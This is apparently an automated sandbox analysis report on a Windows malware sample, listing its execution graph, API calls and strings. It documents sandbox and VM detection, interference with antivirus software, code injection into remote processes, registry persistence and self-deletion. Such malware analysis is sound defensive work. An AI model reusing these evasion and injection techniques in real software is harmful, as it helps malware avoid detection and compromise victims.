                                                                                                                                                                                                              Execution Coverage:1.1%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:64%
                                                                                                                                                                                                              Total number of Nodes:253
                                                                                                                                                                                                              Total number of Limit Nodes:16
                                                                                                                                                                                                              execution_graph 30399 401000 30400 401017 30399->30400 30401 401139 30399->30401 30400->30401 30402 401028 CreateFileA 30400->30402 30402->30401 30403 40104a 30402->30403 30417 401e00 GetCurrentThread OpenThreadToken 30403->30417 30406 401053 ConvertStringSecurityDescriptorToSecurityDescriptorW 30407 4010aa SetFilePointer LockFile WriteFile UnlockFile 30406->30407 30410 40106a GetSecurityDescriptorSacl 30406->30410 30408 401105 30407->30408 30409 4010f5 SetEndOfFile 30407->30409 30413 401113 GetHandleInformation 30408->30413 30414 40112f 30408->30414 30409->30408 30411 4010a0 LocalFree 30410->30411 30412 40108b SetNamedSecurityInfoA 30410->30412 30411->30407 30412->30411 30413->30414 30415 401122 30413->30415 30415->30414 30416 401128 CloseHandle 30415->30416 30416->30414 30418 401e21 GetCurrentProcess OpenProcessToken 30417->30418 30419 401e38 LookupPrivilegeValueA 30417->30419 30418->30419 30420 40104f 30418->30420 30421 401e82 CloseHandle 30419->30421 30422 401e5b AdjustTokenPrivileges 30419->30422 30420->30406 30420->30407 30421->30420 30422->30421 30423 401e75 GetLastError 30422->30423 30423->30421 30424 401e7f 30423->30424 30424->30421 30425 402d30 LoadLibraryA GetModuleFileNameA 30497 403a20 RegOpenKeyExA 30425->30497 30428 402d64 ExitProcess 30429 402d6c 30512 4021d0 CreateFileA 30429->30512 30434 402da1 30523 402360 CreateFileA 30434->30523 30435 402d89 GetTickCount PostMessageA 30435->30434 30444 402dc1 30633 401ea0 40 API calls 30444->30633 30445 402de3 IsUserAnAdmin GetModuleHandleA 30447 402e1c 30445->30447 30448 402dfd GetProcAddress 30445->30448 30451 402e22 30447->30451 30452 402e6e 30447->30452 30448->30447 30450 402e0f GetCurrentProcess 30448->30450 30449 402dc6 30453 402dd2 30449->30453 30454 402dca ExitProcess 30449->30454 30450->30447 30457 402e26 StrStrIA 30451->30457 30458 402e3c 30451->30458 30455 402e76 StrStrIA 30452->30455 30456 402efd 30452->30456 30634 403560 71 API calls 30453->30634 30463 402ea1 30455->30463 30464 402e8c 30455->30464 30461 402930 9 API calls 30456->30461 30457->30458 30459 402e5f 30457->30459 30549 402930 RegCreateKeyExA 30458->30549 30589 402a70 VirtualQuery GetModuleFileNameA 30459->30589 30467 402f08 GlobalFindAtomA 30461->30467 30466 402a70 88 API calls 30463->30466 30470 402930 9 API calls 30464->30470 30472 402ea6 GlobalFindAtomA 30466->30472 30473 402f58 ExitProcess 30467->30473 30474 402f18 GlobalAddAtomA IsUserAnAdmin 30467->30474 30469 402dd7 30469->30445 30476 402ddb ExitProcess 30469->30476 30477 402e97 30470->30477 30479 402ef6 30472->30479 30480 402eb6 GlobalAddAtomA IsUserAnAdmin 30472->30480 30481 402f39 IsUserAnAdmin 30474->30481 30482 402f29 30474->30482 30635 4028d0 43 API calls 30477->30635 30488 4012b0 9 API calls 30479->30488 30485 402ed7 IsUserAnAdmin 30480->30485 30486 402ec7 30480->30486 30487 402f44 30481->30487 30482->30481 30490 402ee2 30485->30490 30486->30485 30637 4015a0 7 API calls 30487->30637 30489 402e69 30488->30489 30489->30473 30636 4015a0 7 API calls 30490->30636 30493 402f4f 30493->30473 30495 401670 32 API calls 30493->30495 30494 402eed 30494->30479 30496 401670 32 API calls 30494->30496 30495->30473 30496->30479 30498 403a6a RegQueryValueExA 30497->30498 30499 403acd GetUserNameA CharUpperA strstr 30497->30499 30500 403a9b RegCloseKey 30498->30500 30501 403a8f RegCloseKey 30498->30501 30502 402d60 30499->30502 30503 403b0b strstr 30499->30503 30500->30499 30504 403aae 30500->30504 30501->30499 30502->30428 30502->30429 30503->30502 30505 403b24 strstr 30503->30505 30504->30499 30504->30502 30505->30502 30506 403b3d GetSystemWindowsDirectoryA GetVolumeInformationA 30505->30506 30506->30502 30507 403b7d 30506->30507 30507->30502 30508 403b99 GetModuleFileNameA StrStrIA 30507->30508 30508->30502 30509 403bc5 StrStrIA 30508->30509 30509->30502 30510 403bd7 StrStrIA 30509->30510 30510->30502 30511 403be9 30510->30511 30511->30502 30513 402350 30512->30513 30514 402320 DeviceIoControl CloseHandle 30512->30514 30515 4020e0 memset SHGetFolderPathA 30513->30515 30514->30513 30516 4021a7 30515->30516 30517 40213e PathAppendA SetCurrentDirectoryA 30515->30517 30518 4021b2 FindWindowA 30516->30518 30519 4021ab FreeLibrary 30516->30519 30517->30516 30520 402161 LoadLibraryA 30517->30520 30518->30434 30518->30435 30519->30518 30520->30516 30521 402175 GetProcAddress 30520->30521 30521->30516 30522 402185 30521->30522 30522->30516 30524 402403 WriteFile GetSystemTimeAsFileTime WriteFile CloseHandle 30523->30524 30525 402444 30523->30525 30524->30525 30526 402450 SHGetFolderPathA 30525->30526 30527 402535 30526->30527 30528 402477 30526->30528 30530 402540 SHGetFolderPathA 30527->30530 30528->30528 30529 4024ec MoveFileA 30528->30529 30529->30527 30531 40266f 30530->30531 30532 40256b CreateFileA 30530->30532 30535 402680 CoInitializeEx 30531->30535 30532->30531 30534 4025d1 11 API calls 30532->30534 30534->30531 30536 4026ae 30535->30536 30537 4026bf GetModuleFileNameW SysAllocString 30535->30537 30536->30537 30539 4028c4 IsUserAnAdmin 30536->30539 30538 4026ed SysAllocString 30537->30538 30544 402866 30537->30544 30540 402853 SysFreeString 30538->30540 30541 4026fe CoCreateInstance 30538->30541 30539->30444 30539->30445 30542 402863 SysFreeString 30540->30542 30540->30544 30543 402725 30541->30543 30546 402827 30541->30546 30542->30544 30543->30540 30543->30546 30547 4027b3 CoCreateInstance 30543->30547 30544->30539 30545 4028be CoUninitialize 30544->30545 30545->30539 30546->30540 30548 4027d5 30547->30548 30548->30546 30550 402975 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA _snprintf 30549->30550 30551 4029fd RegCreateKeyExA 30549->30551 30552 4029e0 30550->30552 30551->30552 30553 402a44 30551->30553 30552->30552 30556 402a3e RegSetValueExA 30552->30556 30554 402a4c RegFlushKey RegCloseKey 30553->30554 30555 402a5d GetCurrentProcessId 30553->30555 30554->30555 30557 401670 30555->30557 30556->30553 30558 4018d8 Sleep 30557->30558 30559 401686 30557->30559 30558->30473 30561 4016a5 30559->30561 30562 40169b Sleep 30559->30562 30638 401cf0 11 API calls 30559->30638 30639 401cf0 11 API calls 30561->30639 30562->30559 30562->30561 30564 4016ac 30565 4018d3 30564->30565 30566 4016b4 OpenProcess 30564->30566 30565->30558 30566->30565 30567 4016cf GetModuleHandleA 30566->30567 30568 401706 30567->30568 30569 4016eb GetProcAddress 30567->30569 30570 40170c GetModuleHandleA 30568->30570 30571 40173f VirtualAllocEx 30568->30571 30569->30568 30572 4016f9 GetCurrentProcess 30569->30572 30573 401722 GetProcAddress 30570->30573 30574 40172e 30570->30574 30575 4018b0 GetHandleInformation 30571->30575 30576 401782 WriteProcessMemory 30571->30576 30572->30568 30573->30574 30574->30571 30574->30575 30575->30565 30577 4018c6 30575->30577 30578 4017ae 30576->30578 30579 40181f WriteProcessMemory FlushInstructionCache CreateRemoteThread 30576->30579 30577->30565 30580 4018cc CloseHandle 30577->30580 30581 4017b1 VirtualAlloc 30578->30581 30588 401819 30578->30588 30582 401862 GetHandleInformation 30579->30582 30583 40188e RtlCreateUserThread 30579->30583 30580->30565 30581->30578 30584 4017c9 memcpy WriteProcessMemory VirtualFree 30581->30584 30585 401885 30582->30585 30586 401878 30582->30586 30583->30575 30584->30578 30585->30575 30586->30585 30587 40187e CloseHandle 30586->30587 30587->30585 30588->30579 30590 402ad0 30589->30590 30590->30590 30591 402adf PathFileExistsA 30590->30591 30592 402af2 GetSystemWindowsDirectoryA 30591->30592 30593 402bf9 _snprintf CopyFileA 30591->30593 30594 402b07 30592->30594 30595 402d26 30593->30595 30596 402c36 30593->30596 30594->30594 30597 402b0f GetModuleHandleA 30594->30597 30628 4012b0 VirtualQuery GetModuleFileNameA PathFileExistsA 30595->30628 30598 402930 9 API calls 30596->30598 30599 402b67 30597->30599 30600 402b47 GetProcAddress 30597->30600 30601 402c3f 30598->30601 30603 402b96 GetTickCount 30599->30603 30604 402b6d 30599->30604 30600->30599 30602 402b59 GetCurrentProcess 30600->30602 30640 401b20 30601->30640 30602->30599 30690 401390 GetTickCount GetModuleHandleA GetProcAddress 30603->30690 30604->30593 30609 402ba2 30691 401420 GetTickCount GetModuleHandleA GetProcAddress 30609->30691 30612 402c59 RtlImageNtHeader 30614 402c64 EntryPoint 30612->30614 30615 402c7d GetProcessHeap HeapValidate 30612->30615 30613 402c9d 30668 401be0 CreateFileA 30613->30668 30614->30615 30615->30613 30617 402c92 GetProcessHeap HeapFree 30615->30617 30617->30613 30619 402cef 30622 402cff GlobalFindAtomA 30619->30622 30679 4014b0 memset memset lstrcpynA CreateProcessA 30619->30679 30620 402ccf GetProcAddress 30620->30619 30621 402ce1 GetCurrentProcess 30620->30621 30621->30619 30624 402d1b GlobalAddAtomA 30622->30624 30625 402d0f 30622->30625 30624->30595 30626 4012b0 9 API calls 30625->30626 30627 402d14 ExitProcess 30626->30627 30629 40137f 30628->30629 30630 40130c GetTempPathA GetTempFileNameA MoveFileExA 30628->30630 30629->30489 30630->30629 30631 401353 SetFileAttributesA DeleteFileA 30630->30631 30631->30629 30632 401373 MoveFileExA 30631->30632 30632->30629 30633->30449 30634->30469 30635->30489 30636->30494 30637->30493 30638->30559 30639->30564 30641 401bd7 30640->30641 30642 401b3b 30640->30642 30652 401150 30641->30652 30643 401150 16 API calls 30642->30643 30644 401b44 30643->30644 30644->30641 30645 401b4e RtlImageNtHeader 30644->30645 30646 401bb5 GetProcessHeap HeapValidate 30645->30646 30647 401b5b GetTickCount GetModuleHandleA 30645->30647 30646->30641 30648 401bcb GetProcessHeap HeapFree 30646->30648 30649 401b95 EntryPoint 30647->30649 30650 401b7e GetProcAddress 30647->30650 30648->30641 30649->30646 30650->30649 30651 401b8e 30650->30651 30651->30649 30653 401166 CreateFileA 30652->30653 30654 40127b 30652->30654 30653->30654 30656 401188 GetFileSizeEx 30653->30656 30655 401282 IsBadWritePtr 30654->30655 30657 401291 30654->30657 30655->30657 30658 40124a 30656->30658 30659 4011a7 GetProcessHeap RtlAllocateHeap 30656->30659 30657->30612 30657->30613 30658->30654 30662 40125f GetHandleInformation 30658->30662 30660 4011d5 30659->30660 30661 4011c6 memset 30659->30661 30660->30658 30663 4011dc SetFilePointer LockFile ReadFile UnlockFile 30660->30663 30661->30660 30662->30654 30664 40126e 30662->30664 30663->30658 30666 401228 GetProcessHeap HeapValidate 30663->30666 30664->30654 30665 401274 CloseHandle 30664->30665 30665->30654 30666->30658 30667 40123e GetProcessHeap HeapFree 30666->30667 30667->30658 30669 401c12 GetFileTime 30668->30669 30670 401ca5 MoveFileExA GetModuleHandleA 30668->30670 30671 401c30 GetHandleInformation 30669->30671 30672 401c4c CreateFileA 30669->30672 30670->30619 30670->30620 30671->30672 30673 401c3f 30671->30673 30672->30670 30674 401c6b SetFileTime 30672->30674 30673->30672 30675 401c45 CloseHandle 30673->30675 30674->30670 30676 401c89 GetHandleInformation 30674->30676 30675->30672 30676->30670 30677 401c98 30676->30677 30677->30670 30678 401c9e CloseHandle 30677->30678 30678->30670 30680 401533 30679->30680 30681 40158f 30679->30681 30682 401545 GetHandleInformation 30680->30682 30683 40155d 30680->30683 30681->30622 30682->30683 30684 401550 30682->30684 30685 401581 30683->30685 30686 401569 GetHandleInformation 30683->30686 30684->30683 30687 401556 CloseHandle 30684->30687 30685->30622 30686->30685 30688 401574 30686->30688 30687->30683 30688->30685 30689 40157a CloseHandle 30688->30689 30689->30685 30690->30609 30691->30604

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 00402D30 Relevance: 64.9, APIs: 28, Strings: 9, Instructions: 157librarywindowCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 0 402d30-402d62 LoadLibraryA GetModuleFileNameA call 403a20 3 402d64-402d66 ExitProcess 0->3 4 402d6c-402d87 call 4021d0 call 4020e0 FindWindowA 0->4 9 402da1-402dbf call 402360 call 402450 call 402540 call 402680 IsUserAnAdmin 4->9 10 402d89-402d9b GetTickCount PostMessageA 4->10 19 402dc1-402dc8 call 401ea0 9->19 20 402de3-402dfb IsUserAnAdmin GetModuleHandleA 9->20 10->9 28 402dd2-402dd9 call 403560 19->28 29 402dca-402dcc ExitProcess 19->29 22 402e1c-402e20 20->22 23 402dfd-402e0d GetProcAddress 20->23 26 402e22-402e24 22->26 27 402e6e-402e70 22->27 23->22 25 402e0f-402e19 GetCurrentProcess 23->25 25->22 32 402e26-402e3a StrStrIA 26->32 33 402e3c-402e5a call 402930 GetCurrentProcessId call 401670 Sleep 26->33 30 402e76-402e8a StrStrIA 27->30 31 402efd-402f16 call 402930 GlobalFindAtomA 27->31 28->20 51 402ddb-402ddd ExitProcess 28->51 38 402ea1-402eb4 call 402a70 GlobalFindAtomA 30->38 39 402e8c-402e9c call 402930 call 4028d0 30->39 48 402f58-402f5a ExitProcess 31->48 49 402f18-402f27 GlobalAddAtomA IsUserAnAdmin 31->49 32->33 34 402e5f-402e64 call 402a70 call 4012b0 32->34 33->48 65 402e69 34->65 54 402ef6-402efb call 4012b0 38->54 55 402eb6-402ec5 GlobalAddAtomA IsUserAnAdmin 38->55 39->48 56 402f39-402f42 IsUserAnAdmin 49->56 57 402f29-402f31 49->57 54->48 61 402ed7-402ee0 IsUserAnAdmin 55->61 62 402ec7-402ecf 55->62 63 402f44 56->63 64 402f49-402f51 call 4015a0 56->64 57->56 68 402ee2 61->68 69 402ee7-402eef call 4015a0 61->69 62->61 63->64 64->48 74 402f53 call 401670 64->74 65->48 68->69 69->54 75 402ef1 call 401670 69->75 74->48 75->54
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(user32.dll), ref: 00402D41
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402D55
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegCloseKey.ADVAPI32(?), ref: 00403A93
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                                • Part of subcall function 00403A20: CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402D66
                                                                                                                                                                                                              • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402D7D
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402D89
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402D9B
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 00402DBB
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402DCC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                              • String ID: IsWow64Process$Pnfw$Wed Jul 6 06:49:26 20112$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
                                                                                                                                                                                                              • API String ID: 3353599405-962637164
                                                                                                                                                                                                              • Opcode ID: 3ea638118beff029f17ac0200bc0c4ed4c7c13e890bf55d737871981aa78e3ae
                                                                                                                                                                                                              • Instruction ID: a3246fa232e6b5ad05535f44e20517c4174ab377f4a657e755d7089196f7c676
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ea638118beff029f17ac0200bc0c4ed4c7c13e890bf55d737871981aa78e3ae
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 085161B0640212ABDB1077B1DF0EB5B3668AF90785F10413ABB05F51E1DBFC9D818AAD
                                                                                                                                                                                                              Function 00403A20 Relevance: 47.4, APIs: 15, Strings: 12, Instructions: 134registrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 127 403a20-403a68 RegOpenKeyExA 128 403a6a-403a8d RegQueryValueExA 127->128 129 403acd-403b05 GetUserNameA CharUpperA strstr 127->129 130 403a9b-403aac RegCloseKey 128->130 131 403a8f-403a99 RegCloseKey 128->131 132 403beb 129->132 133 403b0b-403b1e strstr 129->133 130->129 134 403aae-403ab5 130->134 131->129 135 403bec-403bf2 132->135 133->132 136 403b24-403b37 strstr 133->136 134->129 138 403ab7-403abe 134->138 136->132 137 403b3d-403b7b GetSystemWindowsDirectoryA GetVolumeInformationA 136->137 137->132 139 403b7d-403b82 137->139 138->129 140 403ac0-403ac7 138->140 139->132 141 403b84-403b89 139->141 140->129 140->135 141->132 142 403b8b-403b90 141->142 142->132 143 403b92-403b97 142->143 143->132 144 403b99-403bc3 GetModuleFileNameA StrStrIA 143->144 144->132 145 403bc5-403bd5 StrStrIA 144->145 145->132 146 403bd7-403be7 StrStrIA 145->146 146->132 147 403be9 146->147 147->132
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                              • RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00403A93
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00403A9F
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                              • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403BBF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403BD1
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403BE3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                              • String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\
                                                                                                                                                                                                              • API String ID: 1431998568-3499098167
                                                                                                                                                                                                              • Opcode ID: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                              • Instruction ID: bae6937ecf4d77d63e68da0d133f8e08c9265e2213eddde9df9132157c3c9a9d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A841B8B1944218ABDB20DB54CD89FDF7B7C9B84705F1440AAE704B61C0D779AB448F98
                                                                                                                                                                                                              Function 004021D0 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 81fileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 148 4021d0-40231e CreateFileA 149 402350-402355 148->149 150 402320-40234a DeviceIoControl CloseHandle 148->150 150->149
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 00402313
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402343
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040234A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                              • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                              • API String ID: 33631002-3172865025
                                                                                                                                                                                                              • Opcode ID: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                              • Instruction ID: 06d3a0cb986842bbdb89303b9aef8d686ca65c5df34e7f93c7eeed45953a557b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E4184B0D01358DEEB20CF9599887DEBFB5BB04309F5081ADD6586B241C7BA0A89CF55
                                                                                                                                                                                                              Function 00401150 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 133memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 151 401150-401160 152 401166-401182 CreateFileA 151->152 153 40127b-401280 151->153 152->153 156 401188-4011a1 GetFileSizeEx 152->156 154 401282-40128f IsBadWritePtr 153->154 155 40129f 153->155 157 4012a1-4012a7 154->157 158 401291-40129c 154->158 155->157 159 401254-40125d 156->159 160 4011a7-4011c4 GetProcessHeap RtlAllocateHeap 156->160 159->153 163 40125f-40126c GetHandleInformation 159->163 161 4011d5-4011da 160->161 162 4011c6-4011d2 memset 160->162 161->159 164 4011dc-401226 SetFilePointer LockFile ReadFile UnlockFile 161->164 162->161 163->153 165 40126e-401272 163->165 167 401251 164->167 168 401228-40123c GetProcessHeap HeapValidate 164->168 165->153 166 401274-401275 CloseHandle 165->166 166->153 167->159 169 40124a 168->169 170 40123e-401244 GetProcessHeap HeapFree 168->170 169->167 170->169
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                              • memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401264
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000,?,?,?,00401B44,00000000,00000000), ref: 00401275
                                                                                                                                                                                                              • IsBadWritePtr.KERNEL32(?,00000004), ref: 00401285
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeap$Process$Handle$AllocateCloseCreateFreeInformationLockPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                              • String ID: G,@
                                                                                                                                                                                                              • API String ID: 2214028410-3313068137
                                                                                                                                                                                                              • Opcode ID: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                              • Instruction ID: a7140257f329b7de85cf1082c2828f4b6f45ca3281c26892c76bebf1ae027e6a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C4167B1A00214BBEB109F959D89FAFBB7CEF84B11F10416AFB05F62D0D77459448BA8
                                                                                                                                                                                                              Function 00401B20 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 66memorylibraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 272 401b20-401b35 273 401bd7-401bdd 272->273 274 401b3b-401b48 call 401150 272->274 274->273 277 401b4e-401b59 RtlImageNtHeader 274->277 278 401bb5-401bc9 GetProcessHeap HeapValidate 277->278 279 401b5b-401b7c GetTickCount GetModuleHandleA 277->279 278->273 280 401bcb-401bd1 GetProcessHeap HeapFree 278->280 281 401b95-401bb0 EntryPoint 279->281 282 401b7e-401b8c GetProcAddress 279->282 280->273 281->278 282->281 283 401b8e 282->283 283->281
                                                                                                                                                                                                              APIs
